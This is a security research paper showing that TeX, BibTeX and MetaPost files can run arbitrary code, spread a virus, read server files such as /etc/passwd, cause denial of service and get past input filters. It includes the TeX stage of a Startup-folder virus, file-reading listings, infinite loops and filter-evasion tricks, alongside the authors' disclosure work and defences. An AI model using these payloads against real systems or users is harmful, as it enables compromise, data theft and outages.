Are Text-Only Data Formats Safe?

Or, Use This LaTeX Class File to Pwn Your Computer


Stephen Checkoway (UC San Diego), Hovav Shacham (UC San Diego), Eric Rescorla (RTFM, Inc.)

Abstract

We show that malicious TeX, BibTeX, and MetaPost files can lead to arbitrary code execution, viral infection, denial of service, and data exfiltration, through the file I/O capabilities exposed by TeX’s Turing-complete macro language. This calls into doubt the conventional wisdom that text-only data formats that do not access the network are likely safe. We build a TeX virus that spreads between documents on the MiKTeX distribution on Windows XP; we demonstrate data exfiltration attacks on web-based LaTeX previewer services.

1 Introduction

The divide between “code” and “data” is among the most fundamental in computing. Code expresses behavior or functionality to be carried out by a computer; data encodes and describes an object (a photo, a spreadsheet, etc.) that is conceptually inert, and examined or manipulated by means of appropriate code. The complexity of data formats for media manipulated by desktop systems, together with the inability of programmers to write bug-free code, has generated a stream of exploits in common media formats. These exploits take advantage of software bugs to induce arbitrary behavior when a user views a data file, even seemingly simple ones such as Windows’ animated cursors [16]. The inclusion of powerful scripting languages in file formats like Microsoft’s Word has led to so-called macro viruses,¹ and to PostScript documents that violate a paper reviewer’s anonymity [3]. These two trends have combined in the use of PDF files that include JavaScript to exploit bugs in Adobe’s Acrobat; by one report [19], some 80% of exploits in the fourth quarter of 2009 used malicious PDF files. Thus the complexity and opacity of data formats has made data behave more like code. On the other side, a line of work culminating in the English-language shellcode of Mason et al. [13] has shown how to make code look more like data.

¹ Amusingly, some advocacy documents list “no macro viruses” as an advantage TeX has over Word; see, e.g., http://web.mit.edu/klund/www/urk/texvword.html.

In this paper, we present a case study of another unsafe data format, one that is of particular interest to the academic community: TeX. Unlike Word documents or PDF files, the input file formats associated with TeX are all plain text and thus, naïvely, “safe.” LaTeX and BibTeX files are routinely transmitted in research environments, a practice we show is fundamentally unsafe. Compiling a document with standard TeX distributions allows total system compromise on Windows and information leakage on UNIX.

TeX is unsafe. Donald Knuth’s TeX is the standard typesetting system for mathematical documents. It is also a Turing-complete macro language used to interpret scripts from potentially untrusted sources. In this paper, we show that a specific capability exposed to TeX macros, the ability to read and write arbitrary files, makes it (and other commonly used bits of TeXware, such as BibTeX and MetaPost) a threat to system security and data privacy.

We demonstrate two concrete attacks. First, as an example of running arbitrary programs, we build a TeX virus that affects recent MiKTeX distributions on Windows XP, spreading to all of a user’s TeX documents. The virus requires no user action beyond compiling an infected file. Our virus does nothing but infect other documents, but it could download and execute binaries or undertake any other action it wishes.

Second, we describe data exfiltration and denial of service attacks against web-based LaTeX and MetaPost previewer services. Our findings have implications for any online service that compiles or hosts TeX files on behalf of untrusted users, including the Comprehensive TeX Archive Network (CTAN) and Cornell University Library’s arXiv.org preprint server.

Defenses. The lesson we teach here is one learned over and over: As the Internet has made document sharing easier and more pervasive, file formats once considered trusted have become attack vectors, either because the parser was insecure or because the scripting capabilities exposed to files in the format have unforeseen consequences. Barring a fundamental change in the way that data-handling code is designed and implemented, we must set aside the idea that data, unlike code, can be “safe”; we should instead treat data-processing code as inherently insecure and design systems that can withstand its compromise, as, for example, Bernstein has advocated [5].

For TeX specifically, there are three main approaches to protect against abuse of interpreted languages. First,
one could audit the interpreter for vulnerabilities that allow the attacker to subvert the intended restrictions on the scripting language. Such vulnerabilities are commonly found in supposedly safe file formats and frequently allow the attacker to execute arbitrary code, as in Dowd’s recent ActionScript exploit [8]. We know of no such vulnerabilities in TeX, but their absence does nothing to defend against capabilities granted to TeX scripts by design, including the file I/O that forms the basis for our attacks. A second approach is to attempt to establish a safe subset of commands, through blacklisting, whitelisting, or other forms of filtering or rewriting. (This is akin to code-rewriting systems in which code is verified safe at load-time [17].) As we show below, the malleability of the TeX language makes it difficult to filter safely. A final, more drastic approach is to treat the entire system as untrusted and sandbox it using the operating system’s isolation mechanisms; as we show, this seems like the most promising approach for TeX.

Observations similar to the ones we have made for TeX apply to other data formats that are programmable (e.g., using JavaScript) or require complicated and error-prone parsers. Ensuring that all programs that process such formats are appropriately sandboxed represents a reimagination of the way traditional desktop environments are engineered; a redesigned system would dovetail with the principles laid out by Bernstein [5].

2 Low-level details of TeX

In this section, we recall some features of the TeX programming language and the LaTeX macro package. The discussion covers only the behaviors on which our attacks rely; for more complete coverage we refer the reader to [6, 11, 24]. Even so, the discussion is quite technical. Readers not interested in TeX arcana are encouraged to continue to Section 3, referring back to this section as necessary.

Important control sequences. TeX and LaTeX behavior is principally controlled by a variety of control sequences, conventionally a sequence of characters prefaced by a backslash (\). Below are some of the control sequences we will use in the remainder of the paper.

\catcode  TeX primitive that changes the category code of a character: \catcode`\X=0 changes the category code of X from its default, “letter,” to “escape character.”
\csname . . . \endcsname  TeX primitive that builds control sequences: \csname foo\endcsname is (almost) the same as \foo.
\include  LaTeX macro that behaves as \input except that the included material begins on a new page: \include{file}.
\input  TeX primitive (redefined by LaTeX) that reads the contents of its space-separated argument as if the text were typed directly into the main document: \input file (or in LaTeX, \input{file}).
\@input  LaTeX internal similar to TeX’s \input.
\@@input  LaTeX internal identical to TeX’s \input.
\jobname  TeX primitive that expands to the name of the file being compiled without its extension.
\newread  (La)TeX macro to allocate a new stream for file reading: \newread\file.
\openin  TeX primitive that opens a file and associates it with a read stream: \openin\file=foo.ext.
\read  TeX primitive that reads a line from a file, assigning each character the category code currently in effect: \read\file to\line stores the tokens produced from the file into \line.
\readline  ε-TeX extension that behaves as \read but assigns only the category codes “other” and “space.”
\relax  TeX primitive that takes no action; just relaxes.
\write  TeX primitive that writes an expanded token list to a file: \write\file{foo}.

Other control sequences are used below, but either their behavior is clear or their use is not of central importance.

TeX parsing behavior. TeX’s behavior is usually described in terms of a “mouth” and a “stomach.” The exact behavior is fairly complex but the following simplified description will suffice for this paper. TeX’s mouth reads each line of input character by character and produces a stream of tokens which are acted on by TeX’s stomach. There are two types of tokens produced by TeX’s mouth, character tokens and control sequences, and their production is governed by the category code (an integer in 0–15) of the characters read. At any given time, each input character is associated with a single category code. Except in certain situations, expandable tokens (e.g., macros) are expanded into other tokens en route to TeX’s stomach. Once in the stomach, TeX processes the tokens, performing assignments (such as changing category codes) and typesetting.

When TeX encounters two identical character tokens with category code 7 (by default only ^), followed by two lowercase hexadecimal digits, it treats the four characters as if a single character whose ASCII value is that hexadecimal number had appeared in the input.

3 Malicious TeX usage

It is generally assumed that it is safe to process arbitrary, untrusted documents with TeX, and by extension LaTeX. However, this is untrue; in fact, TeX can write arbitrary files to the filesystem. On UNIX systems, TeX output is typically restricted to the local directory and its subdirectories, which limits the scope of attack somewhat. However, MiKTeX, the most common TeX distribution for Windows, has no internal controls on where output can be written.
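To make the file-writing capability concrete, the following is a minimal and deliberately harmless sketch. It assumes a LaTeX document compiled with any standard engine; the stream name \demoout and the output file name are hypothetical choices made for illustration, and the file is created only in the current directory, which is the location that restricted UNIX configurations typically still permit.

```latex
\documentclass{article}
\begin{document}
% Allocate an output stream; \demoout is a hypothetical name.
\newwrite\demoout
% Open a file next to the document, e.g. paper-demo.txt for paper.tex.
\immediate\openout\demoout=\jobname-demo.txt
% Write one line of text, then close the stream.
\immediate\write\demoout{Written while compiling \jobname.tex}
\immediate\closeout\demoout
This page is typeset as usual.
\end{document}
```

Nothing in the typeset output reveals that a file was created, which is why the capability is easy to overlook when reviewing a document by its PDF alone.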
This ability to write to any file presents an obvious danger in that important files can be overwritten or the computing environment can be changed by the introduction of new files. The average user’s computer is a target-rich environment, with any number of files which, when modified, allow the attacker to execute code in the user’s environment. For concreteness, we focus on a single case: on Windows XP we can write JScript files to a user’s Startup directory which will be executed by the Windows Script Host facility at login.

Once the script is executed, one possibility is that it could download and run a binary of the attacker’s choice using the Microsoft.XMLHTTP object. For example, this could cause the computer to become part of a botnet.

There is one technical hurdle that must be overcome in order to write to the Startup directory, namely spaces in the file path, which TeX does not ordinarily allow. However, we can leverage Windows’ compatibility with older programs that expect file and directory names in 8.3 format. For example, Start Menu can be specified as STARTM~1. We use this compatibility in our proof-of-concept for application execution, a LaTeX virus.

3.1 A two-stage virus

The virus attacks in two phases. In the first phase, it copies the payload to disk and installs the appropriate JScript file into Startup. In the second phase, the JScript file finds other LaTeX documents on the disk and infects them.

The first phase takes advantage of the fact that the TeX engine used in MiKTeX (and indeed in all modern TeX distributions) is pdfTeX, which contains the ε-TeX extension \readline [23]. First, \readline is used to read the document being compiled line by line and write an exact copy to C:\WINDOWS\Temp\sploit.tmp. Then, a JScript file containing the second phase of the virus is written to the Administrator’s Startup directory. Since the exact details of how this is accomplished are rather technical, they are omitted; however, the code for the first phase is given in Listing 1.

The second phase, written in JScript, first creates a FileSystemObject, then reads the sploit.tmp file and extracts all of the TeX code between two marker lines: the virus code. Next, it finds all of the files in the Administrator directory with the extension .tex. Finally, those files which contain \end{document} have the virus inserted just before the end.

In total, the virus requires two marker lines and 21 80-column lines of TeX. The TeX code is given in Listing 1; in the interest of not providing a complete, working virus, the majority of the JScript is omitted, but the remaining code is straightforward and we have tested it in our own systems. Moreover, it should be clear that we could in principle execute any JScript code and do far more damage than just modifying LaTeX files on disk.

An earlier proof-of-concept TeX virus for NetBSD was designed in 1994 by Keith McMillan [15]. McMillan’s virus modifies a user’s GNU Emacs initialization file (something no longer possible with Web2C-based TeX distributions) and relies on the user’s visiting a directory in Emacs to spread to other .tex files in that directory. By contrast, our virus works on modern Windows systems and requires no user interaction beyond an eventual relogin.

3.2 BibTeX databases

One potential barrier to using TeX for application execution is that the user might notice any malicious code present in files he is editing. BibTeX databases provide a two-fold solution by (1) moving the malicious code out of the main document so it is less noticeable; and (2) allowing the code to be widely distributed.

BibTeX is a program used to turn a database of references (the .bib files) into LaTeX code for a bibliography consisting of the references for the citations in the paper (the .bbl files). Subsequent runs of LaTeX cause the text of the generated .bbl files to be \input into the document at the specified location. It is quite common for users to simply download BibTeX entries or even entire databases, such as the RFC BibTeX files provided by Miguel Garcia Martin. In the latter case, the database often contains a large number of entries which the user does not carefully examine; indeed he may never even look at the entries but rather search the database with a tool such as RefTeX. This facilitates an attack since malicious code may be harder to notice in a large file full of unused information.

Each BibTeX entry has the form @type..., where type is one of the types understood by a particular style such as book or article. There is an additional entry type, @preamble, which inserts text verbatim into the .bbl file just before the bibliography. In addition, multiple @preamble entries are concatenated into a single line in the order they appear in the database. Thus, malicious code can be separated into arbitrarily many parts and scattered (in order) throughout the .bib file, and will be executed regardless of which entries the author actually cites.

Other file formats that embed TeX commands can also be used as attack vectors. Examples include graphics languages such as MetaPost and Asymptote.

3.3 Class and style files

Base LaTeX functionality is extended through the use of class files, which set the overall format of the document to be produced, and style files, which typically change the behavior of one aspect of the document. At present,
Listing 1: Virus code with JScript omitted.
%%%%SPLOIT%%%%
{\newwrite\w\let\c\catcode\c`*13\def*{\afterassignment\d\count255"}\def\d{%
\expandafter\c\the\count255=12}{*0D\def\a#1ˆˆM{\immediate\write\w{#1}}\c`ˆˆM5%
\newread\r\openin\r=\jobname \immediate\openout\w=C:/WINDOWS/Temp/sploit.tmp
\loop\unless\ifeof\r\readline\r to\l\expandafter\a\l\repeat\immediate\closeout
\w\closein\r}{*7E*24*25*26*7B*7D\immediate\openout
\w=C:/DOCUME˜1/ADMINI˜1/STARTM˜1/PROGRAMS/STARTUP/sploit.js \c`[1\c`]2\c`\@0
\newlinechar`\ˆˆJ\endlinechar-1*5C@immediate@write
@w[fso=new ActiveXObject("Scripting.FileSystemObject");foo=ˆˆJ
⟨11 lines of JScript omitted⟩
f(fso.GetFolder("C:\\Documents and Settings\\Administrator"));}m();]
@immediate@closeout@w]}%
%%%%SPLOIT%%%%
CTAN has 1080 user-contributed LaTeX 2ε packages. The MiKTeX repository on CTAN has 1908 packages. Similar to the situation with large BibTeX databases, most users never examine a style or class file. If a popular package on one of the many CTAN mirrors were modified to contain malicious code, it might affect a large number of LaTeX users before being discovered.

Rather than corrupting an existing package, an attacker could submit a package, e.g., purporting to implement the guidelines for submission to a conference, to CTAN. Anyone using such a package would be at risk.

4 Web-based LaTeX previewers

We now turn our attention to a slightly harder target. There are more than a dozen web-based services that compile LaTeX files on users’ behalf and return the resulting PDFs. We have designed successful exfiltration and file writing attacks on most of these services. Moreover, the filtering mechanisms devised by these services were largely ineffective against our attacks. We have disclosed the vulnerabilities we found to the operators of the affected services, with universally positive responses. As a result, a number of operators changed their security policy or removed the previewer altogether.

4.1 Reading files

All properly configured web servers allow only a subset of the files on the computer to be visible to connecting clients. In this section, we show how we can use the power of TeX to read files from web servers that expose a LaTeX interface.

There are various ways that an attacker can use the exposed LaTeX interface to read files not exposed by the web server. The two most obvious approaches are using \input or \include to interpolate the text of the file into the TeX input and hence the output document. One minor problem with this approach is that line breaks in the input file are lost, since TeX will treat them as spaces in the usual manner. One way to avoid losing line breaks, as well as circumventing blacklisting of such control sequences, is to use TeX’s ability to read files. The basic idea is to open a file for reading, read it one line at a time, and feed it to the typesetting engine. The code for this is given in Listing 2.

Listing 2: Reading a file a line at a time.
\openin5=/etc/passwd
\def\readfile{%
  \read5 to\curline
  \ifeof5 \let\next=\relax
  \else \curline~\\
    \let\next=\readfile
  \fi
  \next}%
\ifeof5 Couldn't read the file!%
\else \readfile \closein5
\fi

An additional problem is processing characters in the input that TeX considers to be special. For example, running the code in Listing 2 on one of the authors’ computers produces the error “You can’t use ‘macro parameter character #’ in horizontal mode.” This is easily fixed by changing the category code for # with \catcode`\#=12 before the \read command in Listing 2 and restoring it afterward. Other special characters can be handled in an analogous manner. Alternatively, the \readline primitive from ε-TeX can be used.

4.2 Writing files

As discussed in Section 3, Web2C-based TeX distributions such as teTeX and TeX Live typically only allow files to be output in the current directory or a subdirectory. However, this still leaves room for attacks. A common way to generate images for displaying in a web page is to make a temporary directory (for example in /tmp) and generate the needed files inside that directory. Afterward, the images are copied elsewhere or used immediately and then the whole directory is deleted. A previewer that generates images in a web-accessible directory and then cleans up only the specific files it knows will be generated but not needed may be vulnerable to attack. For example, on a web server that allows PHP, an attacker need only open a file using \openout and use \write
to write PHP code, which would then be executed by the server when the attacker made an HTTP request for that file. If the previewer is based on MiKTeX, these constraints are relaxed and the attack is even easier.

4.3 Denial of service

Any previewer that allows the TeX looping construct \loop . . . \repeat or the definition of new macros is at risk of a denial of service attack. The shortest form of this attack is \loop\iftrue\repeat. Another way to achieve this is to use \def\nothing{\nothing}. The loops cause TeX to burn CPU cycles without actually producing anything. If enough such instances run at once, the computer will slow to a crawl and no more useful work will be possible until the processes are killed.

One extension of this attack is to cause TeX to produce very large files, potentially filling up the disk. The way to do this without exhausting TeX’s memory is to produce pages of output so that TeX will discard from its memory the pages it has already processed. This can be done using \shipout, a TeX primitive that writes the contents of the following box to the output file.

4.4 Escaping math mode

Many of the LaTeX previewers on the web were designed only to display mathematics. As a result, the text that the user inputs is copied into a mathematics environment in an otherwise-complete LaTeX document to pass off to LaTeX for compilation. The most common way to do this is to put the input inside an eqnarray* or align* environment. To get out of math mode, we simply start the input with \end{eqnarray*} (resp. \end{align*}) and, to ensure that the document compiles, we end the input with \begin{eqnarray*} (resp. \begin{align*}). Alternatively, to get out of math mode temporarily, we can use \parbox.

4.5 Evading Filters

The natural defense against the attacks described in this section is to filter out dangerous commands. However, this is more difficult than it first appears. In this section, we describe a number of techniques for evading simple filters. For concreteness, the discussion below is limited to \input, but most of the techniques are applicable to all the commands discussed above.

Using some of the features and control sequences described in Section 2, we can use \input without having to write the literal string \input. For example, we can use \csname input\endcsname. This attack is more likely to succeed than \input because \csname is used mostly by package writers and only rarely by authors.

An attacker can evade simpleminded filters by using \catcode to change the category code of another character to “escape” and use that in place of \. For example, one can change the category code of ‘X’ and use Xinput. Additionally, one can use ^^5c in place of \ as described in Section 2. Of course, characters other than \ can be replaced as well; for example, if the word “input” is not allowed anywhere in the previewer’s input, then ‘p’ can be replaced with ^^70.

Yet another possibility is for an attacker to invoke \@input or \@@input directly; this requires using either \makeatletter or \catcode to change the category code of @ to “letter.” In all likelihood, there are a number of LaTeX internals that could be used to facilitate an attack. These are much less well known outside of the package writing community and are thus likely to escape the notice of a web site administrator attempting to secure a LaTeX previewer.

One can make use of a peculiarity of the implementation of LaTeX environments to evade filters that look for control sequences starting with \. A LaTeX environment foo consists of a pair \begin{foo} . . . \end{foo}. The \begin{foo} and \end{foo} macros execute the control sequences \foo and \endfoo using \csname. Thus, one can execute any control sequence by passing its name as the argument to \begin. If \endfoo is not defined, TeX defines it as \relax. For example, \begin{TeX}\end{TeX} eventually executes \TeX\relax. Since the backslash before the control sequence name is not present when using \begin, it does not trigger a filter looking for particular control sequences which begin with \. One can pass arguments to a macro simply by placing the argument after the \begin. For example, one can read files with \begin{input}{/file/path}\end{input}.

4.6 MetaPost

MetaPost is a declarative, macro programming language, based on METAFONT, used to produce vector graphics, often for inclusion into (La)TeX documents. Like TeX, MetaPost is an extremely powerful language and as such, there are dangers associated with providing a MetaPost previewer on the web.

The first such danger is the ability to write arbitrary single-line TeX fragments. Any literal text that appears between btex and etex is written to a tex file which is compiled by TeX, and the result is included into the MetaPost output; this is often used for typesetting labels. MetaPost provides a way to include arbitrary, multi-line TeX code at the beginning of the tex file used with btex...etex using the verbatimtex...etex construct. The latexMP package makes using LaTeX for typesetting easy. It includes a macro textext which takes a string argument containing a single line of LaTeX to typeset. As a result, all of the attacks discussed thus far work just as well for a MetaPost previewer that allows the btex...etex construction or allows the use of the latexMP package.
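Looking back at the filter-evasion techniques of Section 4.5, the alternative spellings can be compared side by side in a harmless sketch. It uses \TeX (the logo macro, which the paper also uses in its \begin example) as a stand-in for a filtered command, and it assumes an ordinary LaTeX document with default category codes; each of the four lines is expected to typeset the TeX logo even though only a comment contains the literal string \TeX.

```latex
\documentclass{article}
\begin{document}
% Each line below is meant to run \TeX without spelling it literally.

% 1. \csname builds the control sequence from its name.
\csname TeX\endcsname

% 2. The caret notation for hex code 5c is read as a backslash.
^^5cTeX

% 3. Inside the group, X has category code 0 (escape), so XTeX acts as \TeX.
{\catcode`\X=0 XTeX}

% 4. \begin{TeX} runs \csname TeX\endcsname; \end{TeX} runs \endTeX (\relax).
\begin{TeX}\end{TeX}
\end{document}
```

A filter that scans the raw input for a fixed list of backslash-prefixed names would pass all four lines, which illustrates why matching on source text is weaker than restricting what the engine itself is allowed to do.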
Even worse, from a web site administrator’s point of view, is that since latexMP allows strings and not just literal data to be typeset, attempting to sanitize input to the textext macro requires performing a data flow analysis that can prove that no harmful control sequences make it into the string ultimately used as the argument.

A second danger is that MetaPost includes commands for reading and writing files, readfrom and write, respectively. To read an arbitrary file such as /etc/passwd, we can use the code in Listing 3.

Listing 3: Reading a file with MetaPost.
picture p;
p := nullpicture;
forever:
  string line;
  line := readfrom "/etc/passwd";
  exitif line = EOF;
  p := thelabel.lrt( line,
    (0, ypart llcorner p) );
  draw p;
endfor;

As seen in Listing 3, MetaPost has a command forever that loops forever. In addition to forever, MetaPost allows macro definitions via def which can be used to simulate looping. As before, we can actually do more than simply burn CPU cycles. We can try to write large files or write many files. For example, Listing 4 will produce a maximum of 4096 files per minute. This limit is due to MetaPost’s maximum numeric value being slightly under 4096.

Listing 4: Creating 4096 files per minute with MetaPost.
filenametemplate "%j%c%y%m%d%H%M";
i := 0;
forever:
  beginfig(i);
  % Add MetaPost code here
  endfig;
  if i = 4095:
    i := 0;
  else:
    i := i + 1;
  fi;
endfor;

One final avenue of attack against a MetaPost previewer is to use the scantokens command. It takes a string argument and reads the string as if the contents had been written literally in the file at that point, with a few exceptions. In particular, any of the attacks listed here could be created using string operations and then passed to scantokens.

4.7 Evaluation

We tested the aforementioned attacks against a variety of web sites running LaTeX previewers. The previewers examined vary in the type of content they were meant to accept, from a single mathematical expression to an entire LaTeX document.

Since our goal was to probe but not attack these web sites, file reading was restricted to files with no security implications such as /etc/hostname on UNIX and C:\WINDOWS\win.ini on Windows. Rather than actually produce multiple infinite looping instances, we test that macros can be defined by defining benign macros using \def, \gdef, etc. Looping via \loop is attempted using the code in Listing 5. If \loop is allowed, the fragment will output “before after before.” Once it has been determined which of the looping constructs work, a single infinite loop is produced to check for the presence of timeouts.² No attempts were made to write files; consequently, those attacks are unevaluated. Table 1 contains the results of the attacks. As can be seen, the majority of the attacks were successful.

² Since webservers typically have timeouts of several minutes for CGI (for example, Apache and IIS both default to five minutes), this infinite loop causes no real damage. However, the timeout is long enough that a real attacker attempting a denial of service would simply have to create new infinite loops every few minutes.

4.7.1 Equation previewers

The first group of LaTeX previewers in Table 1 [4, 7, 12, 14, 18, 22] are meant to display a single mathematical statement at a time. Many of the previewers’ authors took precautions against several of the file reading attacks described in Section 4.1 by attempting to preprocess the input and either remove or disallow particular portions of input, with varying degrees of success. All of them neglected to account for the TeX primitive \openin, and all were potentially vulnerable to denial of service attacks via infinite loops using either \loop or \def.

4.7.2 Full document previewers

The second group of LaTeX previewers in Table 1 [1, 9, 20, 21, 26, 27] are meant to display a complete LaTeX document. By their very nature, full document previewers must be permissive if they are to be useful. Full document previewers are potentially subject to all of the same vulnerabilities as the equation previewers as well as vulnerabilities that come from allowing the inclusion of packages. For example, the listings package, designed to typeset source code listings, can be used to read and display text files. All of the full document previewers we evaluate except for ScribTeX, which employs several of the defenses discussed in Section 4.8, are vulnerable to all of the attacks except \input.

4.7.3 MathTran

MathTran [25] was designed as a TeX previewer with security in mind. MathTran uses Secure plain TeX, a
Columns, in order: \loop, \def, \input, \@input, \csname, \catcode, ^^5c, \openin, \begin (each row below lists its X marks without column alignment)
LaTeX Eqn. Ed. for the Internet [4]: X X X X X
Roger’s Online Eqn. Ed. [7]: X X X X X X X X X
LaTeX Eqn. Ed. [12]: X X X X X X X X
mathURL† [14]: X X X X X X X X
Hamline LaTeX Eqn. Ed. [18]: X X X X X X X X X
MathBin.net [22]: X X X X X X X X
ScribTeX‡ [1]: X X
LaTeX Previewer [9]: X X X X X X X X
ScienceSoft LaTeX [20]: X X X X X X X X
LaTeXLab [21]: X X X X X X X X X
LaTeX Online Compiler [26]: X X X X X X X X
Web LaTeX [27]: X X X X X X X X X
MathTran [25]: (none)

Table 1: LaTeX previewer vulnerabilities. The \loop and \def columns contain an X if the attack could be used to cause a denial of service by producing an infinite loop. The other columns contain an X if the attack can be used to read input.
† The only files we were able to read were the input and the ones produced by LaTeX. It is unknown if others were accessible.
‡ The previewer contains a timeout of several seconds.

Listing 5: Testing for \loop.
\newif\iffoo\footrue
\loop before
\iffoo after \foofalse
\repeat

reimplementation of plain TeX that prevents using any control sequence other than those meant for typesetting. As a result, all of the attacks described above fail, with the one exception of escaping from math mode. This is the most secure web-based previewer we evaluate.

4.7.4 METAPOST

The one METAPOST previewer we evaluate [10] is vulnerable to reading and writing files using the METAPOST commands. Through the btex...etex construct, it is also vulnerable to all of the attacks that [9] is vulnerable to.

4.8 Defenses against attacks

As we have seen, simply filtering out macros deemed unsafe is problematic. First, the list of macros that would need to be blacklisted is quite large, especially if the user can add additional packages. For example, the LaTeX 2ε kernel alone defines the macros \include, \input, \@input, \@iinput, \@input@, \@@input, and \InputIfFileExists [6]. Second, style and class files can contain additional macros for reading files, for example \lstinputlisting from the listings package or \verbatiminput from the verbatim package. The blacklisting approach seems unlikely to succeed without a complete understanding of TeX and LaTeX.

Instead of blacklisting unsafe macros, we could whitelist macros deemed safe. This approach seems difficult to implement and verify successfully. For example, it would be easy to overlook the fact that ^^5c starts a new control sequence. In addition, for the previewer to be useful, the list of acceptable control sequences would be quite large. MathTran [25] takes a similar approach, except that rather than have a preprocessing step, plain TeX itself is completely reimplemented.

Rather than preprocessing the input, a better approach leverages the power of TeX to perform the input sanitization. The mathURL previewer [14] takes this approach by redefining \input and \include to be no-op macros that just expand to their own arguments. Had \@@input been redefined instead, the majority of the file reading attacks would have failed, since all of LaTeX's input macros rely on \@@input. Similar to blacklisting, this approach requires deciding on a set of disallowed macros and then redefining them; however, the ^^5c, \catcode, \csname, and \begin attacks do not defeat it, because each of them still reaches only the redefined macros. As with blacklisting, it still requires knowing which control sequences to redefine.

A more promising approach for preventing TeX from reading sensitive files is to leverage TeX runtime configuration parameters. Web2C-based TeX distributions contain the runtime configuration parameter openin_any that, when set to p, for "paranoid," disallows reading any files in a parent directory. By default, this parameter is set to allow any files to be read. This relies on the particular TeX implementation correctly implementing this parameter. Unfortunately, MiKTeX does not contain a similar configuration parameter. A similar parameter for Web2C-based distributions controls writing.

A second approach (which can be used in concert with the first) is to run TeX in an operating system jail containing just the files needed for the TeX distribution. This approach has two major advantages. First, it is not sensitive to details of the TeX implementation. Second, it allows us to leverage existing work on process isolation.
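The runtime-configuration defense described above can be sketched as a texmf.cnf fragment for a Web2C-based distribution. This is a minimal sketch under stated assumptions, not a vetted hardening profile: openin_any and its value p come from the text, whereas openout_any is assumed here to be the write-side parameter that the text mentions without naming, and the location of texmf.cnf depends on the installation.

```
% texmf.cnf fragment (sketch; the file's location varies by installation)

% p = "paranoid": refuse to read files in a parent directory
openin_any = p

% Assumption: openout_any is the corresponding parameter that controls writing
openout_any = p
```

On a Web2C-based installation, running kpsewhich -var-value=openin_any should report the value actually in effect. The setting only helps if the TeX implementation enforces it, which is why it pairs well with the jail approach.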

We note that ScribTeX uses both the configuration and jail approaches and this is the reason it is impervious to all of the file reading attacks [2].

Defending against denial of service attacks only requires a timeout short enough to ensure that the server does not get overwhelmed.

5 Conclusions

Conventional wisdom in security distinguishes between "safe" and "unsafe" data files. Binary files are more risky than text files; content that interacts with the network is more risky than purely local content. In this paper, we argue that even seemingly safe data files can be unsafe. Although TeX documents are plain text, manipulating maliciously constructed LaTeX documents or class files, BibTeX databases, or METAPOST graphics files can lead to arbitrary code execution, viral infection, denial of service, and data exfiltration.

Acknowledgments

We thank Stefan Savage for numerous helpful conversations; Troy Henderson for letting us experiment extensively with his LaTeX and METAPOST previewers; llll from FreeNode's #latex for pointing out the \begin attack; and the anonymous reviewers for their helpful comments.

References

[1] James Allen. ScribTeX. http://www.scribtex.com.
[2] James Allen. Personal communication, April 2008.
[3] Michael Backes, Markus Dürmuth, and Dominique Unruh. Information flow in the peer-reviewing process (extended abstract). In Birgit Pfitzmann and Patrick McDaniel, editors, Proceedings of IEEE Security & Privacy 2007, pages 187–191. IEEE Computer Society, May 2007.
[4] Will Bateman and Steve Mayer. LaTeX equation editor for writing mathematics on the internet. http://www.codecogs.com/components/equationeditor/equationeditor.php.
[5] Daniel J. Bernstein. Some thoughts on security after ten years of qmail 1.0. In Ravi Sandhu and Jon A. Solworth, editors, Proceedings of CSAW 2007, pages 1–10. ACM Press, November 2007. Invited paper.
[6] Johannes Braams, David Carlisle, Alan Jeffrey, Leslie Lamport, Frank Mittelbach, Chris Rowley, and Rainer Schöpf. The LaTeX 2ε sources, December 2005.
[7] Roger Cortesi. Roger's online equation editor. http://rogercortesi.com/eqn/index.php.
[8] Mark Dowd. Application-specific attacks: Leveraging the ActionScript virtual machine. http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf, April 2008.
[9] Troy Henderson. LaTeX previewer. http://www.tlhiv.org/ltxpreview.
[10] Troy Henderson. METAPOST previewer. http://www.tlhiv.org/mppreview.
[11] Donald E. Knuth. The TeXbook. Addison-Wesley Professional, 1986.
[12] LaTeX equation editor. http://www.sitmo.com/latex.
[13] Joshua Mason, Sam Small, Fabian Monrose, and Greg MacManus. English shellcode. In Somesh Jha and Angelos Keromytis, editors, Proceedings of CCS 2009, pages 524–33. ACM Press, November 2009.
[14] mathURL. http://mathurl.com.
[15] Keith Allen McMillan. A platform independent computer virus. Master's thesis, The University of Wisconsin–Milwaukee, April 1994. Online: http://vx.netlux.org/lib/vkm00.html.
[16] Microsoft. Vulnerabilities in GDI could allow remote code execution (925902). Microsoft Security Bulletin MS07-017, April 2007. Online: http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx.
[17] George C. Necula and Peter Lee. Safe kernel extensions without run-time checking. In Karin Peterson and Willy Zwaenepoel, editors, Proceedings of OSDI 1996, pages 229–43. USENIX, ACM SIGOPS, and IEEE TCOS, October 1996.
[18] Andy Rundquist. Hamline university physics department LaTeX equation editor. http://www.hamline.edu/~arundquist/equationeditor.
[19] ScanSafe. Annual global threat report. Online: http://www.scansafe.com/downloads/gtr/2009_AGTR.pdf, 2009.
[20] ScienceSoft LaTeX. http://sciencesoft.at/latex/?lang=en.
[21] Bobby Soares. LaTeXLab. http://www.latexlab.org.
[22] Mark A. Stratman. MathBin.net. http://mathbin.net.
[23] Hàn Thế Thành, Sebastian Rahtz, Hans Hagen, Hartmut Henkel, Paweł Jackowski, and Martin Schröder. The pdfTeX user manual, January 2007.
[24] The NTS Team. The ε-TeX manual. Max-Planck-Institut für Physik, February 1998.
[25] The Open University. MathTran – Online translation of mathematical content. http://mathtran.open.ac.uk.
[26] Annett Thüring. LaTeX online compiler. http://nirvana.informatik.uni-halle.de/~thuering/php/latex-online/latex.php.
[27] Web LaTeX. http://dev.baywifi.com/latex.
